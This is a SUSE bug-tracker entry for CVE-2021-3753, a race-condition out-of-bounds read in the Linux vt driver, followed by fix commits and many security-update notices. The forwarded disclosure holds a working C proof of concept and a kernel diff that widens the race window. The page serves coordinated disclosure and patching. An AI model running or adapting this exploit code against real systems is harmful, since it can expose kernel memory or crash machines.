Bug 1190025 - (CVE-2021-3753) VUL-0: CVE-2021-3753: kernel-source: race out-of-bounds in vt for latest linux
(CVE-2021-3753)
VUL-0: CVE-2021-3753: kernel-source: race out-of-bounds in vt for latest linux
Status: IN_PROGRESS
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/308796
CVSSv3.1:SUSE:CVE-2021-3753:2.9:(AV:L...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2021-08-31 15:43 UTC by Gianluca Gabrielli
Modified: 2022-07-21 20:11 UTC (History)
3 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Gianluca Gabrielli 2021-08-31 15:43:40 UTC
From the distros ML
---

Hi,

We recently discovered a race oob read in vt in the latest kernel (
v4.19.205 for now ), and the patch
<https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=ffb324e6f874121f7dce5bdae5e05d02baae7269>
can't
handle this bug.

The root cause of this vulnerability is that the write access to vc_mode is
not protected by lock in vt_ioctl (KDSETMDE).

To trigger the oob, we set the crafted vc_visible_origin by using the
following steps:

  Thread 1                                        Thread 2
                                                                      Thread
3
vt_ioctl()
    case KDSETMODE:
        vc->vc_mode = KD_GRAPHICS

                                            vt_ioctl()
                                                case TIOCL_BLANKSCREEN:
                                                    if (
vc->vc_mode != KD_TEXT)

console_blanked = fg_console + 1;
                                                ... ...
                                                case VT_RESIZE
                                                    set_origin()
                                                        vgacon_set_origin()

// make vc_visible_origin not equal to vga_vram_base
                                                            if (
console_blanked && !vga_palette_blanked)
                                                                return 0;



                                                     vt_ioctl()

                                                         case
KDSETMODE:


vc->vc_mode = KD_TEXT

                                            write()
                                                do_con_write()
                                                    do_con_troll()
                                                        lf()
                                                            con_scroll()

// set vga_rolled_over
                                                                vgacon_scroll()
                                                                    if (
c->vc_mode != KD_TEXT)

return false;

oldo = c->vc_origin;

vga_rolled_over = oldo - vga_vram_base;

                                            vt_ioctl()
                                                case TIOCL_SCROLLCONSOLE:
wrap = rolled_over + c->vc_size_row

// set vc_visible_origin to oob
                                                    c->vc_
visible_origin = vga_vram_base + (from + from_off) % wrap

                                                case TIOCL_SETSEL:
                                                    // trigger oob
                                                    sel_pos(ps)










console_lock();

                                                         ...


console_unlock();



        console_lock();
        ...
        console_unlock();



As you can see, the race window in KDSETMODE (between setting vc_mode
and calling do_unblank_screen/do_blank_screen) is narrow.
For reproducing stably,
 I patched the vt_ioctl.c by adding msleep() between them to extend the
race window.

diff --git a/drivers/tty/vt/vt_ioctl.c b/drivers/tty/vt/vt_ioctl.c
index ce6c7dd..8f61acf 100644
--- a/drivers/tty/vt/vt_ioctl.c
+++ b/drivers/tty/vt/vt_ioctl.c
@@ -28,7 +28,7 @@
 #include <linux/signal.h>
 #include <linux/suspend.h>
 #include <linux/timex.h>
-
+#include <linux/delay.h>
 #include <asm/io.h>
 #include <linux/uaccess.h>

@@ -493,6 +493,7 @@ int vt_ioctl(struct tty_struct *tty,
                /*
                 * explicitly blank/unblank the screen if switching modes
                 */
+               msleep(1000);
                console_lock();
                if (arg == KD_TEXT)
                        do_unblank_screen(1);

After applying my patch, you can use my PoC to trigger the vulnerability
stably.

// author by ziiiro@THU
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/kd.h>
#include <linux/vt.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <pthread.h>
#include <errno.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <linux/prctl.h>
#include <stdint.h>
#include <unistd.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                       } while (0)
int fd;
static int page_size;
#define TIOCL_SETSEL    2
#define TIOCL_SCROLLCONSOLE   13
#define TIOCL_BLANKSCREEN   14
#define TIOCL_SELWORD   1
struct tiocl_lines {
    unsigned char type;
    unsigned char pad[3];
    int lines;
};
struct tiocl_selection {
    unsigned short xs;      /* X start */
    unsigned short ys;      /* Y start */
    unsigned short xe;      /* X end */
    unsigned short ye;      /* Y end */
    unsigned short sel_mode; /* selection mode */
};

#pragma pack(1)
struct tiocl {
    unsigned char type;
    // unsigned char pad;
    struct tiocl_selection sel;
  };


void race1(void *arg)
{

    ioctl(fd, KDSETMODE, KD_GRAPHICS);
}
void race2(void *arg)
{

    ioctl(fd, KDSETMODE, KD_TEXT);
}
int main(int argc, char *argv[])
{
    pthread_t th1,th2;
    int s;
    fd = open("/dev/tty1", O_RDWR);

    // set vc_mode = KD_GRAPHICS
    s = pthread_create(&th1, NULL, (void *)race1, NULL);
    if (s != 0) errExit("pthread_create");

    usleep(100);

    struct tiocl_lines tioclines = {0};
    tioclines.type = TIOCL_BLANKSCREEN;

    // set console_blanked
    ioctl(fd,TIOCLINUX,&tioclines);

    // make vc_origin / vc_visible_origin not equal to vga_vram_base
    struct vt_sizes vt = {4,0x100};
    ioctl(fd,VT_RESIZE, &vt);

    // set vc_mode = KD_TEXT
    s = pthread_create(&th2, NULL, (void *)race2, NULL);
    if (s != 0) errExit("pthread_create");

    usleep(100);
    // set vga_rolled_over
    write(fd, "\x0a", 1);

    vt.v_rows = 5;
    ioctl(fd,VT_RESIZE, &vt);

    // change vc_visible_origin to overflow
    tioclines.type = TIOCL_SCROLLCONSOLE;
    tioclines.lines = -0x23333333;
    ioctl(fd,TIOCLINUX,&tioclines);

    struct tiocl tioc = {0};
    tioc.type = TIOCL_SETSEL;
    tioc.sel.xs = tioc.sel.xe = 30;
    tioc.sel.ys = tioc.sel.ye = 4;
    tioc.sel.sel_mode = TIOCL_SELWORD;
    // buffer overflow
    ioctl(fd, TIOCLINUX, &tioc);

    return 1;
}

My PoC is also valid for Linux-5.14.

I have contacted to security@kernel.org, and I'll post this bug to the
public before 7/9/21.
*I'd like linux-distros to assign a CVE ID to this race bug.*
To patch the race bug, I suggest using console_lock to protect vc_mode.


Thanks,

Ming Yuan
Comment 3 Jiri Slaby 2021-09-01 05:01:20 UTC
commit 2287a51ba822384834dafc1c798453375d1107c7
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Mon Aug 30 08:55:18 2021 -0700

    vt_kdsetmode: extend console locking
Comment 4 Jiri Slaby 2021-09-01 05:55:38 UTC
Pushed to
users/jslaby/SLE15-SP2_EMBARGO/for-next

Waiting for CRD for the rest.
Comment 9 Jiri Slaby 2021-09-02 09:05:31 UTC
(In reply to Marcus Meissner from comment #8)
> as it is public now, no need for embargoed branches.

I know, I already pushed it to my for-next of:
master
SLE15-SP4
SLE15-SP2
cve/linux-2.6.32
cve/linux-3.0
cve/linux-4.12
cve/linux-4.4
Comment 12 OBSbugzilla Bot 2021-09-08 08:47:12 UTC
This is an autogenerated message for OBS integration:
This bug (1190025) was mentioned in
https://build.opensuse.org/request/show/917444 15.2 / kernel-source
Comment 20 OBSbugzilla Bot 2021-09-14 00:47:45 UTC
This is an autogenerated message for OBS integration:
This bug (1190025) was mentioned in
https://build.opensuse.org/request/show/918786 15.2 / kernel-source
Comment 25 Swamp Workflow Management 2021-09-15 19:39:24 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:1271-1: An update that solves 15 vulnerabilities and has 92 fixes is now available.

Category: security (important)
Bug References: 1040364,1124431,1127650,1135481,1152489,1160010,1167032,1168202,1171420,1174969,1175052,1175543,1177399,1180141,1180347,1181006,1181148,1181972,1184114,1184180,1185675,1186731,1187211,1187455,1187468,1187619,1188067,1188172,1188418,1188439,1188616,1188878,1188885,1188924,1188982,1188983,1188985,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189229,1189262,1189291,1189292,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189399,1189400,1189427,1189449,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189832,1189841,1189870,1189883,1190022,1190025,1190115,1190117,1190131,1190181,1190358,1190412,1190428
CVE References: CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38207
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    kernel-debug-5.3.18-lp152.92.2, kernel-default-5.3.18-lp152.92.2, kernel-default-base-5.3.18-lp152.92.2.lp152.8.42.3, kernel-docs-5.3.18-lp152.92.1, kernel-kvmsmall-5.3.18-lp152.92.2, kernel-obs-build-5.3.18-lp152.92.2, kernel-obs-qa-5.3.18-lp152.92.1, kernel-preempt-5.3.18-lp152.92.2, kernel-source-5.3.18-lp152.92.2, kernel-syms-5.3.18-lp152.92.1
Comment 32 Swamp Workflow Management 2021-09-21 19:32:00 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3177-1: An update that solves 16 vulnerabilities and has 98 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1167032,1168202,1174969,1175052,1175543,1177399,1180141,1180347,1181148,1181972,1184114,1184180,1185675,1185902,1186264,1186731,1187211,1187455,1187468,1187619,1188067,1188172,1188418,1188439,1188616,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189229,1189262,1189291,1189292,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189399,1189400,1189427,1189449,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189832,1189841,1189870,1189883,1190025,1190115,1190117,1190131,1190181
CVE References: CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38207
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    kernel-rt-5.3.18-51.2
SUSE Linux Enterprise Module for Realtime 15-SP2 (src):    kernel-rt-5.3.18-51.2, kernel-rt_debug-5.3.18-51.2, kernel-source-rt-5.3.18-51.1, kernel-syms-rt-5.3.18-51.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 33 Swamp Workflow Management 2021-09-21 20:00:07 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3178-1: An update that solves 16 vulnerabilities and has 94 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1174969,1175052,1175543,1177399,1180141,1180347,1181148,1181972,1184180,1186264,1186731,1187211,1187455,1187468,1187619,1188067,1188172,1188418,1188439,1188616,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189229,1189262,1189278,1189291,1189292,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189832,1189841,1189870,1189883,1190025,1190115,1190117,1190131,1190181
CVE References: CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38207
JIRA References: 
Sources used:
SUSE Linux Enterprise Module for Public Cloud 15-SP2 (src):    kernel-azure-5.3.18-18.66.2, kernel-source-azure-5.3.18-18.66.1, kernel-syms-azure-5.3.18-18.66.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 34 Swamp Workflow Management 2021-09-21 20:17:48 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:3179-1: An update that solves 20 vulnerabilities and has 107 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1171420,1174969,1175052,1175543,1177399,1180100,1180141,1180347,1181006,1181148,1181972,1184180,1185902,1186264,1186731,1187211,1187455,1187468,1187483,1187619,1187959,1188067,1188172,1188231,1188270,1188412,1188418,1188616,1188700,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189225,1189229,1189233,1189262,1189291,1189292,1189296,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189393,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189696,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1190022,1190025,1190115,1190117,1190412,1190413,1190428
CVE References: CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38166,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38206,CVE-2021-38207,CVE-2021-38209
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-38.22.2, kernel-source-azure-5.3.18-38.22.1, kernel-syms-azure-5.3.18-38.22.1
Comment 35 Swamp Workflow Management 2021-09-21 20:42:00 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3179-1: An update that solves 20 vulnerabilities and has 107 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1171420,1174969,1175052,1175543,1177399,1180100,1180141,1180347,1181006,1181148,1181972,1184180,1185902,1186264,1186731,1187211,1187455,1187468,1187483,1187619,1187959,1188067,1188172,1188231,1188270,1188412,1188418,1188616,1188700,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189225,1189229,1189233,1189262,1189291,1189292,1189296,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189393,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189696,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1190022,1190025,1190115,1190117,1190412,1190413,1190428
CVE References: CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38166,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38206,CVE-2021-38207,CVE-2021-38209
JIRA References: 
Sources used:
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-38.22.2, kernel-source-azure-5.3.18-38.22.1, kernel-syms-azure-5.3.18-38.22.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 37 Swamp Workflow Management 2021-09-22 19:30:33 UTC
SUSE-SU-2021:3192-1: An update that solves 13 vulnerabilities and has 39 fixes is now available.

Category: security (important)
Bug References: 1040364,1108488,1114648,1127650,1129898,1133374,1183050,1183983,1185902,1185973,1187076,1188000,1188172,1188439,1188616,1188885,1188982,1189057,1189262,1189268,1189269,1189270,1189271,1189272,1189291,1189301,1189384,1189385,1189392,1189399,1189400,1189505,1189506,1189562,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189577,1189579,1189581,1189582,1189639,1189640,1189706,1189846,1190025,1190115,1190117
CVE References: CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.73.2, kernel-source-azure-4.12.14-16.73.1, kernel-syms-azure-4.12.14-16.73.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 38 Swamp Workflow Management 2021-09-23 19:25:28 UTC
SUSE-SU-2021:3206-1: An update that solves 16 vulnerabilities and has 40 fixes is now available.

Category: security (important)
Bug References: 1040364,1108488,1114648,1127650,1129898,1133374,1136513,1171420,1183050,1183983,1185902,1185973,1187076,1188172,1188439,1188616,1188885,1188982,1188983,1188985,1189057,1189262,1189268,1189269,1189270,1189271,1189272,1189291,1189301,1189384,1189385,1189392,1189399,1189400,1189505,1189506,1189562,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189577,1189579,1189581,1189582,1189639,1189640,1189706,1189846,1190022,1190025,1190115,1190117
CVE References: CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204
JIRA References: 
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.88.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.88.1, kernel-obs-build-4.12.14-122.88.2
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.88.1, kernel-source-4.12.14-122.88.1, kernel-syms-4.12.14-122.88.1
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.88.1, kgraft-patch-SLE12-SP5_Update_23-1-8.5.1
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.88.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 39 Swamp Workflow Management 2021-09-23 19:40:05 UTC
SUSE-SU-2021:3217-1: An update that solves 16 vulnerabilities and has 40 fixes is now available.

Category: security (important)
Bug References: 1040364,1108488,1114648,1127650,1129898,1133374,1136513,1171420,1183050,1183983,1185902,1185973,1187076,1188172,1188439,1188616,1188885,1188982,1188983,1188985,1189057,1189262,1189268,1189269,1189270,1189271,1189272,1189291,1189301,1189384,1189385,1189392,1189399,1189400,1189505,1189506,1189562,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189577,1189579,1189581,1189582,1189639,1189640,1189706,1189846,1190022,1190025,1190115,1190117
CVE References: CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204
JIRA References: 
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.57.2, kernel-rt_debug-4.12.14-10.57.2, kernel-source-rt-4.12.14-10.57.1, kernel-syms-rt-4.12.14-10.57.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 40 Swamp Workflow Management 2021-09-23 19:57:47 UTC
SUSE-SU-2021:3205-1: An update that solves 20 vulnerabilities and has 106 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1171420,1174969,1175052,1175543,1177399,1180100,1180141,1180347,1181006,1181148,1181972,1184180,1185902,1186264,1186731,1187211,1187455,1187468,1187483,1187619,1187959,1188067,1188172,1188231,1188270,1188412,1188418,1188616,1188700,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189225,1189229,1189233,1189262,1189291,1189292,1189296,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189393,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1190022,1190025,1190115,1190117,1190412,1190413,1190428
CVE References: CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38166,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38206,CVE-2021-38207,CVE-2021-38209
JIRA References: 
Sources used:
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-59.24.1, kernel-preempt-5.3.18-59.24.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-59.24.1, kernel-livepatch-SLE15-SP3_Update_6-1-7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-59.24.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-59.24.1, kernel-obs-build-5.3.18-59.24.1, kernel-preempt-5.3.18-59.24.1, kernel-source-5.3.18-59.24.1, kernel-syms-5.3.18-59.24.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-59.24.1, kernel-default-5.3.18-59.24.1, kernel-default-base-5.3.18-59.24.1.18.12.1, kernel-preempt-5.3.18-59.24.1, kernel-source-5.3.18-59.24.1, kernel-zfcpdump-5.3.18-59.24.1
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-59.24.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 41 Swamp Workflow Management 2021-09-23 20:17:10 UTC
openSUSE-SU-2021:3205-1: An update that solves 20 vulnerabilities and has 106 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1171420,1174969,1175052,1175543,1177399,1180100,1180141,1180347,1181006,1181148,1181972,1184180,1185902,1186264,1186731,1187211,1187455,1187468,1187483,1187619,1187959,1188067,1188172,1188231,1188270,1188412,1188418,1188616,1188700,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189225,1189229,1189233,1189262,1189291,1189292,1189296,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189393,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1190022,1190025,1190115,1190117,1190412,1190413,1190428
CVE References: CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38166,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38206,CVE-2021-38207,CVE-2021-38209
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-59.24.1, kernel-64kb-5.3.18-59.24.1, kernel-debug-5.3.18-59.24.1, kernel-default-5.3.18-59.24.1, kernel-default-base-5.3.18-59.24.1.18.12.1, kernel-docs-5.3.18-59.24.1, kernel-kvmsmall-5.3.18-59.24.1, kernel-obs-build-5.3.18-59.24.1, kernel-obs-qa-5.3.18-59.24.1, kernel-preempt-5.3.18-59.24.1, kernel-source-5.3.18-59.24.1, kernel-syms-5.3.18-59.24.1, kernel-zfcpdump-5.3.18-59.24.1
Comment 42 Swamp Workflow Management 2021-09-23 20:32:34 UTC
SUSE-SU-2021:3207-1: An update that solves 16 vulnerabilities and has 98 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1167032,1168202,1174969,1175052,1175543,1177399,1180141,1180347,1181148,1181972,1184114,1184180,1185675,1185902,1186264,1186731,1187211,1187455,1187468,1187619,1188067,1188172,1188418,1188439,1188616,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189229,1189262,1189291,1189292,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189399,1189400,1189427,1189449,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189832,1189841,1189870,1189883,1190025,1190115,1190117,1190131,1190181
CVE References: CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38207
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    kernel-default-5.3.18-24.83.2, kernel-default-base-5.3.18-24.83.2.9.38.3
SUSE Linux Enterprise Workstation Extension 15-SP2 (src):    kernel-default-5.3.18-24.83.2, kernel-preempt-5.3.18-24.83.2
SUSE Linux Enterprise Module for Live Patching 15-SP2 (src):    kernel-default-5.3.18-24.83.2, kernel-livepatch-SLE15-SP2_Update_19-1-5.3.4
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    kernel-default-5.3.18-24.83.2
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    kernel-docs-5.3.18-24.83.2, kernel-obs-build-5.3.18-24.83.2, kernel-preempt-5.3.18-24.83.2, kernel-source-5.3.18-24.83.1, kernel-syms-5.3.18-24.83.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    kernel-default-5.3.18-24.83.2, kernel-default-base-5.3.18-24.83.2.9.38.3, kernel-preempt-5.3.18-24.83.2, kernel-source-5.3.18-24.83.1
SUSE Linux Enterprise High Availability 15-SP2 (src):    kernel-default-5.3.18-24.83.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 44 Swamp Workflow Management 2021-10-13 13:38:31 UTC
SUSE-SU-2021:3205-2: An update that solves 20 vulnerabilities and has 106 fixes is now available.

Category: security (important)
Bug References: 1040364,1127650,1135481,1152489,1160010,1168202,1171420,1174969,1175052,1175543,1177399,1180100,1180141,1180347,1181006,1181148,1181972,1184180,1185902,1186264,1186731,1187211,1187455,1187468,1187483,1187619,1187959,1188067,1188172,1188231,1188270,1188412,1188418,1188616,1188700,1188780,1188781,1188782,1188783,1188784,1188786,1188787,1188788,1188790,1188878,1188885,1188924,1188982,1188983,1188985,1189021,1189057,1189077,1189153,1189197,1189209,1189210,1189212,1189213,1189214,1189215,1189216,1189217,1189218,1189219,1189220,1189221,1189222,1189225,1189229,1189233,1189262,1189291,1189292,1189296,1189298,1189301,1189305,1189323,1189384,1189385,1189392,1189393,1189399,1189400,1189427,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1190022,1190025,1190115,1190117,1190412,1190413,1190428
